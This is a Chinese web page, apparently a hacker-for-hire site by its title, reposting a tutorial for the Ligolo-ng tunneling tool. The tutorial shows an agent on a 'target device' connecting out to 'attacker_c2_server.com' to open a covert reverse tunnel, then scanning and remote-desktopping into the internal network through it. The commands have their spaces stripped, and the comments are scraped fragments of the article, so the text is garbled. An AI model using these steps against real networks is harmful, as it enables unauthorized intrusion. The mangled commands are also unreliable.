黑客24小时在线接单的网站

黑客24小时在线接单的网站

2022年04月03日 17:05:00

如何使用Ligolo-ng建立隐蔽的通信信道

关于Ligolo-ng

Ligolo-ng以高级信道工具为基础的高级信道工具TUN接口实现其功能。Ligolo-ng它是一种轻量级的快速工具,可以帮助大多数渗透测试人员使用反向TCP/TLS连接建立隐藏的通信通道,无需SOCKS支持。

功能介绍

                   
  • Tun接口(不再需要SOCKS);
    •                
  • 简单的UI支持代理和网络信息选择的界面;
    •                
  • 易于使用和安装;
    •                
  • 基于Let’s Encrypt自动化证书配置;
    •                
  • 高性能(多路复用);
    •                
  • 不需要高级权限;
    •                
  • 套接字监听/代理绑定;
    •                
  • 多平台代理支持;

工具构建

(1) 构建Ligolo-ng

  • $gobuild-oagentcmd/agent/main.go
  • $gobuild-oproxycmd/proxy/main.go
  • #BuildagentforWindows
  • $GOOS=windowsgobuild-oagent.execmd/agent/main.go

    • (2) 安装Ligolo-ng

    我们需要在自己的命令控制服务器上打开代理服务,默认使用11601端口监控:

  • $sudoiptuntapadduser[your_username]modetunligolo
  • $sudoiplinksetligoloup
  • $./proxy-h#Helpoptions
  • $./proxy-autocert#AutomaticallyrequestLetsEncryptcertificates

    • 工具使用

    首先,我们需要在目标设备上启动代理(无特殊权限):

  • $./agent-connectattacker_c2_server.com:11601

    • 会话链接将出现在代理服务器上:

  • INFO[0102]Agentjoined.name=nchatelain@nworkstationremote="XX.XX.XX.XX:38000"

    • 使用“session”命令选择代理:

  • ligolo-ng»session
  • ?Specifyasession:1-nchatelain@nworkstation-XX.XX.XX.XX:38000

    • 使用“ifconfig”命令显示代理的网络配置信息:

  • [Agent:nchatelain@nworkstation]»ifconfig
  • [...]
  • ┌─────────────────────────────────────────────┐
  • │Interface3│
  • ├──────────────┬──────────────────────────────┤
  • │Name│wlp3s0│
  • │HardwareMAC│de:ad:be:ef:ca:fe│
  • │MTU│1500│
  • │Flags│up|broadcast|multicast│
  • │IPv4Address│192.168.0.30/24│
  • └──────────────┴──────────────────────────────┘

    • 添加指向代理/中继服务器192.168.0.0/24代理网络路由:

  • $sudoiprouteadd192.168.0.0/24devligolo

    • 最后,在代理上打开一条通信信道:

  • [Agent:nchatelain@nworkstation]»start
  • [Agent:nchatelain@nworkstation]»INFO[0690]Startingtunneltonchatelain@nworkstation

    • 现在您可以通过代理服务器访问192.168.0.0/24代理网络:

  • $nmap192.168.0.0/24-v-sV-n
  • [...]
  • $rdesktop192.168.0.123
  • [...]

    • 支持协议/数据包

                     
    • TCP
      •                
    • UDP
      •                
    • ICMP

    性能

    在Ligolo-ng在帮助下,你可以轻松达到100 Mbits/秒的速度。下面给出的测试结果是一个200Mbits/s使用服务器iperf测试的一条200Mbits/s的链接:

  • $iperf3-c10.10.0.1-p24483
  • Connectingtohost10.10.0.1,port24483
  • [5]local10.10.0.224port50654connectedto10.10.0.1port24483
  • [ID]IntervalTransferBitrateRetrCwnd
  • [5]0.00-1.00sec12.5MBytes105Mbits/sec0164KBytes
  • [5]1.00-2.00sec12.7MBytes107Mbits/sec0263KBytes
  • [5]2.00-3.00sec12.4MBytes104Mbits/sec0263KBytes
  • [5]3.00-4.00sec12.7MBytes106Mbits/sec0263KBytes
  • [5]4.00-5.00sec13.1MBytes110Mbits/sec2134KBytes
  • [5]5.00-6.00sec13.4MBytes113Mbits/sec0147KBytes
  • [5]6.00-7.00sec12.6MBytes105Mbits/sec0158KBytes
  • [5]7.00-8.00sec12.1MBytes101Mbits/sec0173KBytes
  • [5]8.00-9.00sec12.7MBytes106Mbits/sec0182KBytes
  • [5]9.00-10.00sec12.6MBytes106Mbits/sec0188KBytes
  • -------------------------
  • [ID]IntervalTransferBitrateRetr
  • [5]0.00-10.00sec127MBytes106Mbits/sec2sender
  • [5]0.00-10.08sec125MBytes104Mbits/secreceiver

    • 注意事项

    由于代理不是以高级权限运行的,原始数据包无法转发。当您执行时“NMAP SYN-SCAN”当代理人一次执行时,TCP connect()。

    在使用Nmap你应该用它“--unprivileged”或“-PE”避免假阳性。

    演示工具

    视频地址:点我看

    项目地址

    Ligolo-ng:【GitHub传送门】

       

    标签:Ligolo-ng 通信信道 安全工具 

    作者:访客 , 分类:缓冲区溢出 , 浏览:470 , 评论:3

    • 评论列表:
    •  泪灼眼趣
       发布于 2022-06-09 03:49:06  回复该评论
    • n.go$gobuild-oproxycmd/proxy/main.go#BuildagentforWindows$GOOS=windowsgobuild-oa
    •  笙沉謓念
       发布于 2022-06-08 19:27:10  回复该评论
    • autocert#AutomaticallyrequestLetsEncryptcertificates工具使用首先,我们需要在目标设备上启动代理(无特殊权限):$./agent-conn
    •  怎忘叙詓
       发布于 2022-06-08 22:14:34  回复该评论
    • eceiver注意事项由于代理不是以高级权限运行的,原始数据包无法转发。当您执行时“NMAP SYN-SCAN”当代理人一次执行时,TCP connect()。在使用Nmap你应该用它“--unprivileg

    发表评论:

    Powered By

    Copyright Your WebSite.Some Rights Reserved.